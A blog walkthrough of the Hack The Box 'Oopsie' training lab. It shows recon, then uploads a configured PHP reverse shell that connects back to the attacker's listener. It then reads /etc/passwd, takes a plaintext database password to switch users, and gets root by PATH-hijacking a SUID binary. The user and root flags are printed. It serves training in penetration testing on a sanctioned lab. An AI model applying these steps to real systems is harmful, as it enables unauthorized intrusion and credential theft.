Top 5 This Week

Related Posts

HTB – Hack the Box – Tier 2 – 2nd Challange – Oopsie

In-Depth Analysis: Solving HTB Tier 2 – Challenge 2 ‘Oopsie’

Welcome to our detailed guide in the “HTB – Hack the Box Series” on solving Tier 2 – Challenge 2, ‘Oopsie’. This article is a part of our comprehensive series, aimed at providing insights into advanced penetration testing methods. For more challenges, visit: HTB – Hack the Box Series.

Updating Kali Linux

Begin by ensuring your Kali Linux system is up-to-date to leverage the latest security tools:

$ sudo apt update
$ sudo apt full-upgrade -y

Establishing a Secure VPN Connection

Connect to the Hack The Box network via VPN for secure and anonymous access:

$ sudo openvpn Downloads/starting_point_UserName.ovpn

Comprehensive Reconnaissance

Perform an extensive scan using Nmap to uncover open ports and services on the target IP address:

┌──(toor㉿kali)-[~]
└─$ nmap -sC -sV 10.129.95.191
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-06 02:37 EST
Nmap scan report for 10.129.95.191
Host is up (0.041s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61e43fd41ee2b2f10d3ced36283667c7 (RSA)
|   256 241da417d4e32a9c905c30588f60778d (ECDSA)
|_  256 78030eb4a1afe5c2f98d29053e29c9f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds

Local DNS Record for Domain Resolution

Create a local DNS record for the domain ‘oopsie.htb’ to facilitate web access:

$ echo '10.129.95.191 oopsie.htb' | sudo tee -a /etc/hosts

Web Traffic Interception and Analysis

Use web traffic interception tools like FoxyProxy and Burp Suite to analyze and manipulate HTTP requests:

Access ID    Name     Email
34322        admin    [email protected]

Access ID    Name     Email
2233         guest    [email protected]

Exploiting Web Application Vulnerabilities

On uploading a file, what directory does that file appear in on the server? – uploads

└─$ gobuster dir -u http://oopsie.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt php
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://oopsie.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/06 07:44:15 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 309] [--> http://oopsie.htb/images/]
/themes               (Status: 301) [Size: 309] [--> http://oopsie.htb/themes/]
/uploads              (Status: 301) [Size: 310] [--> http://oopsie.htb/uploads/]

File Upload and Reverse Shell Execution

  • Now that we can upload files on the server let’s identify a reverse shell php file, modify it and upload it to the server
  • Let’s first identify Kali tun IP address: 10.10.14.217
┌──(toor㉿kali)-[~]
└─$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.14.217  netmask 255.255.254.0  destination 10.10.14.217
        inet6 fe80::120a:9f5a:e625:8183  prefixlen 64  scopeid 0x20<link>
  • copy to working directory this reverse shell
┌──(toor㉿kali)-[~/oopsie]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php .
  • start a Netcat listener with port 4444
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
  • modify the reverse shell with Kali IP and the Netcat port
┌──(toor㉿kali)-[~/oopsie]
└─$ nano php-reverse-shell.php
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.217';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
  • rename the file for ease of use
┌──(toor㉿kali)-[~/oopsie]
└─$ cp php-reverse-shell.php rshell.php
  • upload the file to the webserver
  • http://oopsie.htb/cdn-cgi/login/admin.php?content=uploads
  • execute the file on the webserver
  • http://oopsie.htb/uploads/rshell.php
  • we have established a stable reverse shell connection
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.217] from (UNKNOWN) [10.129.218.191] 58218
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 14:04:35 up  2:20,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Privilege Escalation

Utilize the obtained shell to escalate privileges, identifying potential SUID binaries and exploiting vulnerable scripts:

  • upgrade your shell to be able to autocomplete and to go back and forth
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@oopsie:/$
  • get a list of the standard users of the target server, as now we are “www-data” that has little to no priviledges, we are looking for a “/bin/bash” user, and we found: “robert:x:1000:1000:robert:/home/robert:/bin/bash
www-data@oopsie:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
www-data@oopsie:/$
  • What is the file that contains the password that is shared with the robert user? – db.php
www-data@oopsie:/$ cd /home/robert                 
cd /home/robert
www-data@oopsie:/home/robert$ ls
ls
user.txt
www-data@oopsie:/home/robert$ cat user.txt
cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
www-data@oopsie:/home/robert$
  • let’s now go back to the previous location and look for a password for user robert
www-data@oopsie:/home/robert$ pwd
pwd
/home/robert
www-data@oopsie:/home/robert$ cd /var/www/html
cd /var/www/html
www-data@oopsie:/var/www/html$ ls
ls
cdn-cgi  css  fonts  images  index.php  js  themes  uploads
www-data@oopsie:/var/www/html$ cd cdn-cgi
cd cdn-cgi
www-data@oopsie:/var/www/html/cdn-cgi$ ls
ls
login
www-data@oopsie:/var/www/html/cdn-cgi$ cd login 
cd login
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
www-data@oopsie:/var/www/html/cdn-cgi/login$
  • let’s now switch user into robert
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!

robert@oopsie:/var/www/html/cdn-cgi/login$
  • check what goups robert is part of, and we can see that robert is also part of the goup called: “1001(bugtracker)”
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!

robert@oopsie:/var/www/html/cdn-cgi/login$ 

robert@oopsie:/var/www/html/cdn-cgi/login$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
robert@oopsie:/var/www/html/cdn-cgi/login$
  • What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? – find
  • Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run? – root
  • What SUID stands for? – Set Owner User ID
  • What is the name of the executable being called in an insecure manner? – cat
  • Submit user flag: f2c74ee8db7983851ab2a96a44eb7981
  • Submit root flag – af13b0bee69f8a877c3faf667f7beacf
  • https://www.hackthebox.com/achievement/machine/303878/288
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@oopsie:/$ ls
ls
bin    dev   initrd.img      lib64       mnt   root  snap  tmp  vmlinuz
boot   etc   initrd.img.old  lost+found  opt   run   srv   usr  vmlinuz.old
cdrom  home  lib             media       proc  sbin  sys   var
www-data@oopsie:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
www-data@oopsie:/$ cd /home/robert                 
cd /home/robert
www-data@oopsie:/home/robert$ ls
ls
user.txt
www-data@oopsie:/home/robert$ cat user.txt
cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
www-data@oopsie:/home/robert$ pwd
pwd
/home/robert
www-data@oopsie:/home/robert$ cd /var/www/html
cd /var/www/html
www-data@oopsie:/var/www/html$ ls
ls
cdn-cgi  css  fonts  images  index.php  js  themes  uploads
www-data@oopsie:/var/www/html$ cd cdn-cgi
cd cdn-cgi
www-data@oopsie:/var/www/html/cdn-cgi$ ls
ls
login
www-data@oopsie:/var/www/html/cdn-cgi$ cd login 
cd login
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!

robert@oopsie:/var/www/html/cdn-cgi/login$ 

robert@oopsie:/var/www/html/cdn-cgi/login$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
robert@oopsie:/var/www/html/cdn-cgi/login$ locate bugtracker
locate bugtracker
/usr/bin/bugtracker
robert@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js
robert@oopsie:/var/www/html/cdn-cgi/login$ 
ls                                                                                                                                                 
^C                                                                                                                                                 
                                                                                                                                                   
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
^C
                                                                                                                                                   
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
^C
                                                                                                                                                   
┌──(toor㉿kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.222.116  netmask 255.255.255.0  broadcast 192.168.222.255
        inet6 fe80::a00:27ff:fe1c:f253  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:1c:f2:53  txqueuelen 1000  (Ethernet)
        RX packets 318123  bytes 142384301 (135.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 279241  bytes 56432707 (53.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3505  bytes 2110641 (2.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3505  bytes 2110641 (2.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.14.217  netmask 255.255.254.0  destination 10.10.14.217
        inet6 fe80::120a:9f5a:e625:8183  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef:2::10d7  prefixlen 64  scopeid 0x0<global>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 252225  bytes 114354047 (109.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 253899  bytes 36836866 (35.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                                                                   
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.217] from (UNKNOWN) [10.129.142.20] 58472
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 15:55:10 up 8 min,  0 users,  load average: 0.00, 0.03, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@oopsie:/$ su robert
su robert
Password: M3g4C0rpUs3r!   

robert@oopsie:/$ locate bugtracker
locate bugtracker
/usr/bin/bugtracker
robert@oopsie:/$ pwd
pwd
/
robert@oopsie:/$ cd /var/www/html/cdn-cgi/login$
cd /var/www/html/cdn-cgi/login$
bash: cd: /var/www/html/cdn-cgi/login$: No such file or directory
robert@oopsie:/$ cd /var/www/html/cdn-cgi/l
cd /var/www/html/cdn-cgi/l
bash: cd: /var/www/html/cdn-cgi/l: No such file or directory
robert@oopsie:/$ cd /var/www/html/cdn-cgi/ 
cd /var/www/html/cdn-cgi/
robert@oopsie:/var/www/html/cdn-cgi$ cd login
cd login
robert@oopsie:/var/www/html/cdn-cgi/login$ pwd
pwd
/var/www/html/cdn-cgi/login
robert@oopsie:/var/www/html/cdn-cgi/login$ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
<-la /usr/bin/bugtracker && file /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
robert@oopsie:/var/www/html/cdn-cgi/login$ /usr/bin/bugtracker
/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 2
2
---------------

If you connect to a site filezilla will remember the host, the username and the password (optional). The same is true for the site manager. But if a port other than 21 is used the port is saved in .config/filezilla - but the information from this file isn't downloaded again afterwards.

ProblemType: Bug
DistroRelease: Ubuntu 16.10
Package: filezilla 3.15.0.2-1ubuntu1
Uname: Linux 4.5.0-040500rc7-generic x86_64
ApportVersion: 2.20.1-0ubuntu3
Architecture: amd64
CurrentDesktop: Unity
Date: Sat May 7 16:58:57 2016
EcryptfsInUse: Yes
SourcePackage: filezilla
UpgradeStatus: No upgrade log present (probably fresh install)

robert@oopsie:/var/www/html/cdn-cgi/login$ cd /tmp
cd /tmp
robert@oopsie:/tmp$ echo "/bin/sh" > cat
echo "/bin/sh" > cat
robert@oopsie:/tmp$ chmod +x cat
chmod +x cat
robert@oopsie:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
robert@oopsie:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
robert@oopsie:/tmp$ bugtracker
bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 2
2
---------------

# whoami
whoami
root
#  cd /root
 cd /root
# ls
ls
reports  root.txt
# cat root.txt
cat root.txt
# head root.txt
head root.txt
af13b0bee69f8a877c3faf667f7beacf
# cd /home/robert
cd /home/robert
# ls
ls
user.txt
# head user.txt
head user.txt
f2c74ee8db7983851ab2a96a44eb7981
#

Questions:

  1. With what kind of tool can intercept web traffic? – proxy
  2. What is the path to the directory on the webserver that returns a login page?
  3. What can be modified in Firefox to get access to the upload page?
  4. On uploading a file, what directory does that file appear in on the server? – uploads
  5. What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? – find
  6. Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run? – root
  7. What SUID stands for? – Set Owner User ID
  8. What is the name of the executable being called in an insecure manner? – cat
  9. Submit user flag: f2c74ee8db7983851ab2a96a44eb7981
  10. Submit root flag – af13b0bee69f8a877c3faf667f7beacf

Usefull links:

  • https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  • https://portswigger.net/burp/communitydownload
  • https://www.revshells.com/
  • https://www.hackthebox.com/achievement/machine/303878/288

Conclusion and Ethical Hacking Reminder

This tutorial provides a step-by-step approach to solving the ‘Oopsie’ challenge on HTB. As always, we emphasize ethical hacking practices and encourage the use of such skills for lawful and constructive cybersecurity purposes.

Cogeanu Marius
Cogeanu Mariushttps://cogeanu.com
Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech.Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning.Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight.Discover more on https://cogeanu.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Popular Articles